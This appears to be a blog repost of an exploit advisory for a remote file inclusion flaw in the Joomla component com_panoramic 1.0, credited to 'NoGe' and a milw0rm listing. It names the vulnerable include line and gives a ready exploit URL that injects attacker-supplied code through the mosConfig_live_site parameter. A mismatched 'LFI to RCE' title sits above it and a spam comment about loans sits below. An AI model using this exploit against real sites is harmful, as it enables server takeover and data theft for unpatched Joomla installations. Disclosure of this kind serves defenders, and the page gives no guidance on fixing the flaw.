LFI to RCE via access_log injection

Joomla Component Panoramic Ver 1.0 - RFI


[o] panoramic joomla component 1.0 Remote File Include Vulnerability
Software : com_panoramic version 1.0
Download : http://www.webmaster-tips.net/
Author : NoGe


[o] Vulnerable file
administrator/components/com_panoramic/admin.panoramic.php
line 3 include( "$mosConfig_live_site/components/com_panoramic/about.html" );


[o] Exploit
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4489



Comments

labatterie said…
I did so and used to be happy with my short term loan.